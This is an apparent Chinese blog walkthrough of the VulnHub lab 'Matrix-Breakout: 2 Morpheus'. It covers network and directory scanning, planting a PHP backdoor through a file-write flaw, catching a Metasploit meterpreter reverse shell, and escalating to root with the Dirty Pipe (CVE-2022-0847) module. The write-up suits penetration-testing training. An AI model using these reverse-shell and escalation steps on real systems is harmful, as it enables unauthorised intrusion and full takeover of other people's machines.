vulhub靶场 MATRIX-BREAKOUT: 2 MORPHEUS

靶场搭建:

Matrix-Breakout: 2 Morpheus ~ VulnHub

1、信息收集:

nmap 192.168.0.0/24

2、Web漏洞利用

寻找利用点
  • 使用gobuster进行扫描 gobuster dir -u http://192.168.0.11 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    扫到这个文件
    访问

    发送一个 123 抓包看看
    尝试访问这个文件
    成功写入进去了
利用后门
  • 将文件名改成php,发送后门代码
    哥斯拉连接
    反弹到msf
 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp
 set lhost 0.0.0.0
 set lport 4444
 run


成功反弹

3、内核提权

上传提权工具脚本

upload /home/kali/getpower/linux-exploit-suggester.sh /tmp/1.sh

  • 执行脚本
shell
cd  /tmp
chmod +x 1.sh
./1.sh

重点关注有高亮的

  • 我们知道了 cve-2022-0847有戏,然后到msf去查看是否有利用模块,没有再去网上找
    search cve_2022_0847
    msf存在现成的。
提权
use exploit/linux/local/cve_2022_0847_dirtypipe 
set session 1
set lhost 【你的kaliip】
run


成功提权

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值